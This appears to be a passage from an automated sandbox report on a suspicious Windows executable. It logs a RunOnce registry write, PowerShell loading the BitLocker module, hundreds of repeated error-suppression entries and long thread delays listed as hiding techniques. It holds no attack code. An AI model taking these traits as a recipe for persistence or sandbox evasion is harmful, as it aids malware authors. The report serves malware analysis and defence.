        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E830EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,4_2_00007FF7E6E830EC
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E81684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,4_2_00007FF7E6E81684
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1003Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2460Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3884Jump to behavior
